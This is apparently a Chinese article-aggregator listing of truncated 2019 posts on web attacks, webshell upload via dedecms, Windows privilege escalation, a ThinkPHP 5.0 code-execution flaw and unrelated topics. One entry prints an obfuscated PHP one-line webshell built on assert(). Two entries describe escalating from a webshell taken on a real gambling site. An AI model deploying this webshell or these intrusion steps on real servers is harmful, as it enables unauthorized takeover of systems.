原文转自:https://segmentfault.com/a/1190000018073845 作者:浪里行舟 在互联网时代,数据安全与个人隐私受到了前所未有的挑战,各种新奇的攻击技术层出不穷。如何才能更好地保护我们的数据?本文主要侧重于分析几种常见的攻击的类型以及防御的方法。 一、XSS XSS ...
分类:
Web程序 时间:
2019-02-01 18:05:33
阅读次数:
188
网站后台getshell的方法总结 方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell。 坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用../跳转到 ...
分类:
Web程序 时间:
2019-01-27 16:32:07
阅读次数:
6666
windows提权 0,起因,由于前几天拿了一个菠菜站的webshell,但是只有iis权限,执行无法创建用户等操作,更无法对整个服务器进行控制了,于是此时便需要提权了,对于一个刚刚入门的小白来说,此刻真正意识到了提权的重要性,于是便开始学习提取相关知识,以拿下该菠菜的站点。 提权前的准备工作 1, ...
分类:
其他好文 时间:
2019-01-25 01:10:18
阅读次数:
175
mysql挂死,无法启动,解决mysql无法启动: /etc/my.cnf配置文件中innodb_force_recovery=1然后service mysqld start/etc/my.cnf配置文件中innodb_force_recovery=1注释掉再service mysqld resta ...
分类:
Web程序 时间:
2019-01-24 13:21:42
阅读次数:
176
windows提权之ftp提权 0,起因,由于前几天拿了一个菠菜站的webshell,但是只有iis权限,执行无法创建用户等操作,更无法对整个服务器进行控制了,于是此时便需要提权了,对于一个刚刚入门的小白来说,此刻真正意识到了提权的重要性,于是便开始学习提取相关知识,以拿下该菠菜的站点。 提权前的准 ...
分类:
Windows程序 时间:
2019-01-23 19:32:43
阅读次数:
2503
<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[ ...
分类:
Web程序 时间:
2019-01-21 21:39:43
阅读次数:
209
漏洞描述由于ThinkPHP5.0框架对Request类的method处理存在缺陷,导致黑客构造特定的请求,可直接GetWebShell。 漏洞评级严重 影响版本ThinkPHP 5.0系列 < 5.0.24 安全版本ThinkPHP 5.0系列 5.0.24ThinkPHP 5.1系列 5.1.3 ...
分类:
Web程序 时间:
2019-01-21 16:03:19
阅读次数:
190
从内部来看,已经制定了漏洞管理制度,有专人负责漏洞扫描和修补,但出现紧急漏洞还是手忙脚乱,仍然是疲于应对不断发现的漏洞,在接受监管检查的时候总是有漏洞被发现。从外部来看,漏洞已经成为当前IT领域的热门话题之一。首先,从攻防的不对等角度来说,攻击者对漏洞的利用早已形成了产业化,攻击者利用漏洞的时间窗远 ...
分类:
其他好文 时间:
2019-01-20 00:56:14
阅读次数:
192
第1章 初识微服务微服务的入门,我们从传统的单体架构入手,看看在什么样的环境和需求下一步步走到微服务的,然后再具体了解一下什么才是微服务,让大家对微服务的概念有深入的理解。然后我们一起画一个微服务的架构图,再从架构上去分析微服务架构的优势和不足。 ...1-1 微服务-导学 试看1-2 软件架构的进 ...
分类:
Web程序 时间:
2019-01-18 23:58:21
阅读次数:
335
2019年1月14日消息,thinkphp又被爆出致命漏洞,可以直接远程代码执行,getshell提权写入网站***到网站根目录,甚至直接提权到服务器,该漏洞影响版本ThinkPHP5.0、ThinkPHP5.0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23、thinkphp5.0.22版本。***者可以伪造远程恶意代码,对服务器进行post提交数据来
分类:
Web程序 时间:
2019-01-18 10:57:13
阅读次数:
215
